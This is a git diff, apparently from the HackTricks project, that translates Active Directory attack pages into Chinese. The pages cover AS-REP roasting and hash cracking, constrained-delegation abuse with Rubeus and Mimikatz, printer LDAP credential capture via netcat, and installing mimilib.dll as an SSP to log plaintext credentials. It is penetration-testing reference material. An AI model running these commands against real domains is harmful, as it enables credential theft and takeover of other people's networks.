-Opportunities for **persistence** through **security descriptor modifications of AD CS** components are plentiful. Modifications described in the "[Domain Escalation](domain-escalation.md)" section can be maliciously implemented by an attacker with elevated access. This includes the addition of "control rights" (e.g., WriteOwner/WriteDACL/etc.) to sensitive components such as:
+通过**AD CS**组件的**安全描述符修改**实现**持久性**的机会很多。"[域提升](domain-escalation.md)"部分中描述的修改可以被具有提升访问权限的攻击者恶意实施。这包括向敏感组件添加“控制权限”（例如，WriteOwner/WriteDACL等），例如：
 
-- The **CA server’s AD computer** object
-- The **CA server’s RPC/DCOM server**
-- Any **descendant AD object or container** in **`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`** (for instance, the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, etc.)
-- **AD groups delegated rights to control AD CS** by default or by the organization (such as the built-in Cert Publishers group and any of its members)
+- **CA服务器的AD计算机**对象
+- **CA服务器的RPC/DCOM服务器**
+- **`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`**中的任何**后代AD对象或容器**（例如，证书模板容器、认证机构容器、NTAuthCertificates对象等）
+- **AD组默认或由组织委派控制AD CS的权限**（例如，内置的证书发布者组及其任何成员）
 
-An example of malicious implementation would involve an attacker, who has **elevated permissions** in the domain, adding the **`WriteOwner`** permission to the default **`User`** certificate template, with the attacker being the principal for the right. To exploit this, the attacker would first change the ownership of the **`User`** template to themselves. Following this, the **`mspki-certificate-name-flag`** would be set to **1** on the template to enable **`ENROLLEE_SUPPLIES_SUBJECT`**, allowing a user to provide a Subject Alternative Name in the request. Subsequently, the attacker could **enroll** using the **template**, choosing a **domain administrator** name as an alternative name, and utilize the acquired certificate for authentication as the DA.
+恶意实施的一个示例是，具有**提升权限**的攻击者将**`WriteOwner`**权限添加到默认的**`User`**证书模板，攻击者成为该权限的主体。为了利用这一点，攻击者首先将**`User`**模板的所有权更改为自己。随后，**`mspki-certificate-name-flag`**将在模板上设置为**1**以启用**`ENROLLEE_SUPPLIES_SUBJECT`**，允许用户在请求中提供主题备用名称。随后，攻击者可以使用**模板**进行**注册**，选择**域管理员**名称作为备用名称，并利用获得的证书进行身份验证作为DA。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/ad-dns-records.md b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
index 0c1a6f19d..c34908f9e 100644
--- a/src/windows-hardening/active-directory-methodology/ad-dns-records.md
+++ b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
@@ -1,11 +1,10 @@
-# AD DNS Records
+# AD DNS 记录
 
 {{#include ../../banners/hacktricks-training.md}}
 
-By default **any user** in Active Directory can **enumerate all DNS records** in the Domain or Forest DNS zones, similar to a zone transfer (users can list the child objects of a DNS zone in an AD environment).
-
-The tool [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) enables **enumeration** and **exporting** of **all DNS records** in the zone for recon purposes of internal networks.
+默认情况下，**Active Directory 中的任何用户**都可以**枚举域或森林 DNS 区域中的所有 DNS 记录**，类似于区域传输（用户可以列出 AD 环境中 DNS 区域的子对象）。
 
+工具 [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) 使得**枚举**和**导出**区域中的**所有 DNS 记录**成为可能，以便于内部网络的侦查。
 ```bash
 git clone https://github.com/dirkjanm/adidnsdump
 cd adidnsdump
@@ -14,8 +13,6 @@ pip install .
 adidnsdump -u domain_name\\username ldap://10.10.10.10 -r
 cat records.csv
 ```
-
-For more information read [https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)
+有关更多信息，请阅读 [https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
index a726f5bfd..8d9007fff 100644
--- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
+++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
@@ -1,57 +1,52 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.\
-This is because an attacker could **trick the printer to authenticate against a rouge LDAP server** (typically a `nc -vv -l -p 444` is enough) and to capture the printer **credentials on clear-text**.
+互联网上有几个博客**强调了将打印机配置为使用默认/弱**登录凭据的LDAP的危险。\
+这是因为攻击者可能**欺骗打印机向一个恶意的LDAP服务器进行身份验证**（通常一个`nc -vv -l -p 444`就足够了），并捕获打印机**以明文形式传输的凭据**。
 
-Also, several printers will contains **logs with usernames** or could even be able to **download all usernames** from the Domain Controller.
+此外，一些打印机将包含**带有用户名的日志**，甚至可能能够**从域控制器下载所有用户名**。
 
-All this **sensitive information** and the common **lack of security** makes printers very interesting for attackers.
+所有这些**敏感信息**和普遍的**安全缺失**使打印机对攻击者非常有吸引力。
 
-Some blogs about the topic:
+关于该主题的一些博客：
 
 - [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/)
 - [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
 
-## Printer Configuration
+## 打印机配置
 
-- **Location**: The LDAP server list is found at: `Network > LDAP Setting > Setting Up LDAP`.
-- **Behavior**: The interface allows LDAP server modifications without re-entering credentials, aiming for user convenience but posing security risks.
-- **Exploit**: The exploit involves redirecting the LDAP server address to a controlled machine and leveraging the "Test Connection" feature to capture credentials.
+- **位置**：LDAP服务器列表位于：`Network > LDAP Setting > Setting Up LDAP`。
+- **行为**：该界面允许在不重新输入凭据的情况下修改LDAP服务器，旨在方便用户，但带来了安全风险。
+- **利用**：该利用涉及将LDAP服务器地址重定向到受控机器，并利用“测试连接”功能捕获凭据。
 
-## Capturing Credentials
+## 捕获凭据
 
-**For more detailed steps, refer to the original [source](https://grimhacker.com/2018/03/09/just-a-printer/).**
+**有关更详细的步骤，请参阅原始[来源](https://grimhacker.com/2018/03/09/just-a-printer/)。**
 
-### Method 1: Netcat Listener
-
-A simple netcat listener might suffice:
+### 方法 1：Netcat 监听器
 
+一个简单的netcat监听器可能就足够了：
 ```bash
 sudo nc -k -v -l -p 386
 ```
+然而，这种方法的成功率有所不同。
 
-However, this method's success varies.
+### 方法 2：完整的 LDAP 服务器与 Slapd
 
-### Method 2: Full LDAP Server with Slapd
-
-A more reliable approach involves setting up a full LDAP server because the printer performs a null bind followed by a query before attempting credential binding.
-
-1. **LDAP Server Setup**: The guide follows steps from [this source](https://www.server-world.info/en/note?os=Fedora_26&p=openldap).
-2. **Key Steps**:
-   - Install OpenLDAP.
-   - Configure admin password.
-   - Import basic schemas.
-   - Set domain name on LDAP DB.
-   - Configure LDAP TLS.
-3. **LDAP Service Execution**: Once set up, the LDAP service can be run using:
+一种更可靠的方法是设置一个完整的 LDAP 服务器，因为打印机在尝试凭证绑定之前会执行空绑定，然后进行查询。
 
+1. **LDAP 服务器设置**：该指南遵循来自 [this source](https://www.server-world.info/en/note?os=Fedora_26&p=openldap) 的步骤。
+2. **关键步骤**：
+- 安装 OpenLDAP。
+- 配置管理员密码。
+- 导入基本架构。
+- 在 LDAP 数据库上设置域名。
+- 配置 LDAP TLS。
+3. **LDAP 服务执行**：设置完成后，可以使用以下命令运行 LDAP 服务：
 ```bash
 slapd -d 2
 ```
-
-## References
+## 参考
 
 - [https://grimhacker.com/2018/03/09/just-a-printer/](https://grimhacker.com/2018/03/09/just-a-printer/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/asreproast.md b/src/windows-hardening/active-directory-methodology/asreproast.md
index cb2e308af..0598b100c 100644
--- a/src/windows-hardening/active-directory-methodology/asreproast.md
+++ b/src/windows-hardening/active-directory-methodology/asreproast.md
@@ -4,31 +4,30 @@
 
 <figure><img src="../../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客洞察**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+了解最新的漏洞赏金计划和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作吧！
 
 ## ASREPRoast
 
-ASREPRoast is a security attack that exploits users who lack the **Kerberos pre-authentication required attribute**. Essentially, this vulnerability allows attackers to request authentication for a user from the Domain Controller (DC) without needing the user's password. The DC then responds with a message encrypted with the user's password-derived key, which attackers can attempt to crack offline to discover the user's password.
+ASREPRoast 是一种安全攻击，利用缺乏 **Kerberos 预身份验证所需属性** 的用户。基本上，这个漏洞允许攻击者向域控制器 (DC) 请求用户的身份验证，而无需用户的密码。然后，DC 会用用户的密码派生密钥加密的消息进行响应，攻击者可以尝试离线破解以发现用户的密码。
 
-The main requirements for this attack are:
+此攻击的主要要求是：
 
-- **Lack of Kerberos pre-authentication**: Target users must not have this security feature enabled.
-- **Connection to the Domain Controller (DC)**: Attackers need access to the DC to send requests and receive encrypted messages.
-- **Optional domain account**: Having a domain account allows attackers to more efficiently identify vulnerable users through LDAP queries. Without such an account, attackers must guess usernames.
-
-#### Enumerating vulnerable users (need domain credentials)
+- **缺乏 Kerberos 预身份验证**：目标用户必须未启用此安全功能。
+- **连接到域控制器 (DC)**：攻击者需要访问 DC 以发送请求并接收加密消息。
+- **可选的域账户**：拥有域账户可以让攻击者通过 LDAP 查询更有效地识别易受攻击的用户。没有这样的账户，攻击者必须猜测用户名。
 
+#### 枚举易受攻击的用户（需要域凭据）
 ```bash:Using Windows
 Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
 ```
@@ -36,9 +35,7 @@ Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
 ```bash:Using Linux
 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
 ```
-
-#### Request AS_REP message
-
+#### 请求 AS_REP 消息
 ```bash:Using Linux
 #Try all the usernames in usernames.txt
 python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
@@ -50,21 +47,17 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
 .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
 Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
 ```
-
 > [!WARNING]
-> AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0.
-
-### Cracking
+> 使用 Rubeus 进行 AS-REP Roasting 将生成一个 4768，加密类型为 0x17，预身份验证类型为 0。
 
+### 破解
 ```bash
 john --wordlist=passwords_kerb.txt hashes.asreproast
 hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 ```
+### 持久性
 
-### Persistence
-
-Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties):
-
+强制 **preauth** 对于您拥有 **GenericAll** 权限（或写入属性的权限）的用户不是必需的：
 ```bash:Using Windows
 Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
 ```
@@ -72,12 +65,10 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
 ```bash:Using Linux
 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
 ```
+## 无凭证的ASREProast
 
-## ASREProast without credentials
-
-An attacker can use a man-in-the-middle position to capture AS-REP packets as they traverse the network without relying on Kerberos pre-authentication being disabled. It therefore works for all users on the VLAN.\
-[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) allows us to do so. Moreover, the tool forces client workstations to use RC4 by altering the Kerberos negotiation.
-
+攻击者可以利用中间人位置捕获AS-REP数据包，因为它们在网络中传输，而不依赖于Kerberos预身份验证被禁用。因此，它适用于VLAN上的所有用户。\
+[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) 允许我们这样做。此外，该工具通过更改Kerberos协商强制客户端工作站使用RC4。
 ```bash
 # Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
 ASRepCatcher relay -dc $DC_IP
@@ -88,8 +79,7 @@ ASRepCatcher relay -dc $DC_IP --disable-spoofing
 # Passive listening of AS-REP packets, no packet alteration
 ASRepCatcher listen
 ```
-
-## References
+## 参考
 
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
 
@@ -97,18 +87,17 @@ ASRepCatcher listen
 
 <figure><img src="../../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客洞察**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+了解最新的漏洞赏金发布和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶尖黑客合作吧！
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/bloodhound.md b/src/windows-hardening/active-directory-methodology/bloodhound.md
index 8ea9c71c0..6076bd2a7 100644
--- a/src/windows-hardening/active-directory-methodology/bloodhound.md
+++ b/src/windows-hardening/active-directory-methodology/bloodhound.md
@@ -4,95 +4,84 @@
 
 ## AD Explorer
 
-[AD Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) is from Sysinternal Suite:
+[AD Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) 来自 Sysinternal Suite:
 
-> An advanced Active Directory (AD) viewer and editor. You can use AD Explorer to navigate an AD database easily, define favourite locations, view object properties, and attributes without opening dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute.
+> 一个高级的 Active Directory (AD) 查看器和编辑器。您可以使用 AD Explorer 轻松浏览 AD 数据库，定义收藏位置，查看对象属性和属性而无需打开对话框，编辑权限，查看对象的架构，并执行可以保存和重新执行的复杂搜索。
 
 ### Snapshots
 
-AD Explorer can create snapshots of an AD so you can check it offline.\
-It can be used to discover vulns offline, or to compare different states of the AD DB across the time.
+AD Explorer 可以创建 AD 的快照，以便您可以离线检查。\
+它可以用于离线发现漏洞，或比较 AD 数据库在不同时间的不同状态。
 
-You will be requires the username, password, and direction to connect (any AD user is required).
+您需要提供用户名、密码和连接方向（需要任何 AD 用户）。
 
-To take a snapshot of AD, go to `File` --> `Create Snapshot` and enter a name for the snapshot.
+要创建 AD 的快照，请转到 `File` --> `Create Snapshot` 并输入快照的名称。
 
 ## ADRecon
 
-[**ADRecon**](https://github.com/adrecon/ADRecon) is a tool which extracts and combines various artefacts out of an AD environment. The information can be presented in a **specially formatted** Microsoft Excel **report** that includes summary views with metrics to facilitate analysis and provide a holistic picture of the current state of the target AD environment.
-
+[**ADRecon**](https://github.com/adrecon/ADRecon) 是一个从 AD 环境中提取和组合各种工件的工具。信息可以以 **特别格式化** 的 Microsoft Excel **报告** 的形式呈现，其中包括带有指标的摘要视图，以便于分析并提供目标 AD 环境当前状态的整体图景。
 ```bash
 # Run it
 .\ADRecon.ps1
 ```
-
 ## BloodHound
 
-From [https://github.com/BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
+来自 [https://github.com/BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
 
-> BloodHound is a single page Javascript web application, built on top of [Linkurious](http://linkurio.us/), compiled with [Electron](http://electron.atom.io/), with a [Neo4j](https://neo4j.com/) database fed by a C# data collector.
+> BloodHound 是一个单页面的 Javascript 网络应用程序，建立在 [Linkurious](http://linkurio.us/) 之上，使用 [Electron](http://electron.atom.io/) 编译，并配备一个由 C# 数据收集器提供数据的 [Neo4j](https://neo4j.com/) 数据库。
 
-BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.
+BloodHound 使用图论来揭示 Active Directory 或 Azure 环境中隐藏的、通常是无意的关系。攻击者可以使用 BloodHound 轻松识别高度复杂的攻击路径，这些路径在其他情况下将无法快速识别。防御者可以使用 BloodHound 识别并消除这些相同的攻击路径。蓝队和红队都可以使用 BloodHound 更深入地理解 Active Directory 或 Azure 环境中的权限关系。
 
-So, [Bloodhound ](https://github.com/BloodHoundAD/BloodHound)is an amazing tool which can enumerate a domain automatically, save all the information, find possible privilege escalation paths and show all the information using graphs.
+因此，[Bloodhound](https://github.com/BloodHoundAD/BloodHound) 是一个惊人的工具，可以自动枚举域，保存所有信息，查找可能的权限提升路径，并使用图形显示所有信息。
 
-Booldhound is composed of 2 main parts: **ingestors** and the **visualisation application**.
+BloodHound 由两个主要部分组成：**ingestors** 和 **visualisation application**。
 
-The **ingestors** are used to **enumerate the domain and extract all the information** in a format that the visualisation application will understand.
+**ingestors** 用于 **枚举域并提取所有信息**，以便可视化应用程序理解的格式。
 
-The **visualisation application uses neo4j** to show how all the information is related and to show different ways to escalate privileges in the domain.
+**visualisation application 使用 neo4j** 来显示所有信息之间的关系，并展示在域中提升权限的不同方式。
 
-### Installation
+### 安装
 
-After the creation of BloodHound CE, the entire project was updated for ease of use with Docker. The easiest way to get started is to use its pre-configured Docker Compose configuration.
-
-1. Install Docker Compose. This should be included with the [Docker Desktop](https://www.docker.com/products/docker-desktop/) installation.
-2. Run:
+在创建 BloodHound CE 后，整个项目进行了更新，以便于使用 Docker。开始的最简单方法是使用其预配置的 Docker Compose 配置。
 
+1. 安装 Docker Compose。这应该包含在 [Docker Desktop](https://www.docker.com/products/docker-desktop/) 安装中。
+2. 运行：
 ```
 curl -L https://ghst.ly/getbhce | docker compose -f - up
 ```
+3. 在 Docker Compose 的终端输出中找到随机生成的密码。  
+4. 在浏览器中，导航到 http://localhost:8080/ui/login。使用用户名 admin 和日志中的随机生成密码登录。  
 
-3. Locate the randomly generated password in the terminal output of Docker Compose.
-4. In a browser, navigate to http://localhost:8080/ui/login. Login with a username of admin and the randomly generated password from the logs.
+之后，您需要更改随机生成的密码，您将准备好新的界面，从中可以直接下载 ingestors。  
 
-After this you will need to change the randomly generated password and you will have the new interface ready, from which you can directly download the ingestors.
-
-### SharpHound
-
-They have several options but if you want to run SharpHound from a PC joined to the domain, using your current user and extract all the information you can do:
+### SharpHound  
 
+他们有几个选项，但如果您想从加入域的 PC 上运行 SharpHound，使用您当前的用户并提取所有信息，您可以这样做：
 ```
 ./SharpHound.exe --CollectionMethods All
 Invoke-BloodHound -CollectionMethod All
 ```
+> 您可以在 [这里](https://support.bloodhoundenterprise.io/hc/en-us/articles/17481375424795-All-SharpHound-Community-Edition-Flags-Explained) 阅读更多关于 **CollectionMethod** 和循环会话的信息。
 
-> You can read more about **CollectionMethod** and loop session [here](https://support.bloodhoundenterprise.io/hc/en-us/articles/17481375424795-All-SharpHound-Community-Edition-Flags-Explained)
-
-If you wish to execute SharpHound using different credentials you can create a CMD netonly session and run SharpHound from there:
-
+如果您希望使用不同的凭据执行 SharpHound，您可以创建一个 CMD netonly 会话并从那里运行 SharpHound：
 ```
 runas /netonly /user:domain\user "powershell.exe -exec bypass"
 ```
-
-[**Learn more about Bloodhound in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
+[**了解更多关于 Bloodhound的信息，请访问 ired.team。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
 
 ## Group3r
 
-[**Group3r**](https://github.com/Group3r/Group3r) is a tool to find **vulnerabilities** in Active Directory associated **Group Policy**. \
-You need to **run group3r** from a host inside the domain using **any domain user**.
-
+[**Group3r**](https://github.com/Group3r/Group3r) 是一个用于查找与 **组策略** 相关的 Active Directory 中的 **漏洞** 的工具。\
+您需要使用 **任何域用户** 从域内的主机上 **运行 group3r**。
 ```bash
 group3r.exe -f <filepath-name.log>
 # -s sends results to stdin
 # -f send results to file
 ```
-
 ## PingCastle
 
-[**PingCastle**](https://www.pingcastle.com/documentation/) **evaluates the security posture of an AD environment** and provides a nice **report** with graphs.
+[**PingCastle**](https://www.pingcastle.com/documentation/) **评估AD环境的安全态势**并提供一个漂亮的**报告**和图表。
 
-To run it, can execute the binary `PingCastle.exe` and it will start an **interactive session** presenting a menu of options. The default option to use is **`healthcheck`** which will establish a baseline **overview** of the **domain**, and find **misconfigurations** and **vulnerabilities**.&#x20;
+要运行它，可以执行二进制文件`PingCastle.exe`，它将启动一个**交互式会话**，呈现选项菜单。默认选项是**`healthcheck`**，它将建立一个**域**的基线**概述**，并查找**错误配置**和**漏洞**。&#x20;
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/constrained-delegation.md b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
index 14d1d1fcf..24163be7d 100644
--- a/src/windows-hardening/active-directory-methodology/constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
@@ -1,22 +1,21 @@
-# Constrained Delegation
+# 受限委派
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Constrained Delegation
+## 受限委派
 
-Using this a Domain admin can **allow** a computer to **impersonate a user or computer** against a **service** of a machine.
+使用此功能，域管理员可以**允许**计算机**模拟用户或计算机**以访问机器的**服务**。
 
-- **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED_TO_AUTH_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user.
-- **Service for User to Proxy(**_**S4U2proxy**_**):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
+- **用户自我服务（**_**S4U2self**_**）：** 如果**服务账户**的_userAccountControl_值包含[TRUSTED_TO_AUTH_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) (T2A4D)，则它可以代表任何其他用户为自己（该服务）获取TGS。
+- **用户代理服务（**_**S4U2proxy**_**）：** **服务账户**可以代表任何用户为在**msDS-AllowedToDelegateTo**中设置的服务获取TGS。为此，它首先需要从该用户获取TGS，但可以使用S4U2self在请求另一个之前获取该TGS。
 
-**Note**: If a user is marked as ‘_Account is sensitive and cannot be delegated_ ’ in AD, you will **not be able to impersonate** them.
+**注意**：如果用户在AD中标记为‘_账户是敏感的，无法被委派_’，则您将**无法模拟**他们。
 
-This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).
+这意味着如果您**破解了服务的哈希**，您可以**模拟用户**并代表他们获得对**配置的服务**的**访问**（可能的**特权提升**）。
 
-Moreover, you **won't only have access to the service that the user is able to impersonate, but also to any service** because the SPN (the service name requested) is not being checked, only privileges. Therefore, if you have access to **CIFS service** you can also have access to **HOST service** using `/altservice` flag in Rubeus.
-
-Also, **LDAP service access on DC**, is what is needed to exploit a **DCSync**.
+此外，您**不仅可以访问用户能够模拟的服务，还可以访问任何服务**，因为SPN（请求的服务名称）没有被检查，只有权限。因此，如果您可以访问**CIFS服务**，您也可以使用Rubeus中的`/altservice`标志访问**HOST服务**。
 
+此外，**DC上的LDAP服务访问**是利用**DCSync**所需的。
 ```bash:Enumerate
 # Powerview
 Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
@@ -44,12 +43,10 @@ tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31
 tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
 .\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
 ```
-
 > [!WARNING]
-> There are **other ways to obtain a TGT ticket** or the **RC4** or **AES256** without being SYSTEM in the computer like the Printer Bug and unconstrain delegation, NTLM relaying and Active Directory Certificate Service abuse
+> 有**其他方法可以获取TGT票证**或**RC4**或**AES256**，而不需要在计算机上成为SYSTEM，例如打印机漏洞和不受限制的委派、NTLM中继和Active Directory证书服务滥用。
 >
-> **Just having that TGT ticket (or hashed) you can perform this attack without compromising the whole computer.**
-
+> **仅凭该TGT票证（或哈希），您可以在不危害整个计算机的情况下执行此攻击。**
 ```bash:Using Rubeus
 #Obtain a TGS of the Administrator user to self
 .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
@@ -77,8 +74,6 @@ tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.mo
 #Load the TGS in memory
 Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
 ```
-
-[**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
+[**更多信息请访问 ired.team。**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/custom-ssp.md b/src/windows-hardening/active-directory-methodology/custom-ssp.md
index 979a785ef..686f15a81 100644
--- a/src/windows-hardening/active-directory-methodology/custom-ssp.md
+++ b/src/windows-hardening/active-directory-methodology/custom-ssp.md
@@ -4,44 +4,37 @@
 
 ### Custom SSP
 
-[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
-You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.
+[了解什么是 SSP (Security Support Provider) 在这里。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
+您可以创建您自己的 **SSP** 来 **捕获** 以 **明文** 形式使用的 **凭据** 以访问机器。
 
 #### Mimilib
 
-You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\
-Drop the dll in `C:\Windows\System32\`\
-Get a list existing LSA Security Packages:
-
+您可以使用 Mimikatz 提供的 `mimilib.dll` 二进制文件。**这将把所有凭据以明文形式记录在一个文件中。**\
+将 dll 放入 `C:\Windows\System32\`\
+获取现有 LSA 安全包的列表：
 ```bash:attacker@target
 PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
 
 HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
-    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
+Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
 ```
-
-Add `mimilib.dll` to the Security Support Provider list (Security Packages):
-
+将 `mimilib.dll` 添加到安全支持提供程序列表（安全包）：
 ```powershell
 reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
 ```
+在重启后，所有凭据可以在 `C:\Windows\System32\kiwissp.log` 中以明文形式找到。
 
-And after a reboot all credentials can be found in clear text in `C:\Windows\System32\kiwissp.log`
-
-#### In memory
-
-You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):
+#### 在内存中
 
+您还可以直接使用 Mimikatz 在内存中注入此内容（请注意，这可能有点不稳定/无法工作）：
 ```powershell
 privilege::debug
 misc::memssp
 ```
+这不会在重启后存活。
 
-This won't survive reboots.
+#### 缓解措施
 
-#### Mitigation
-
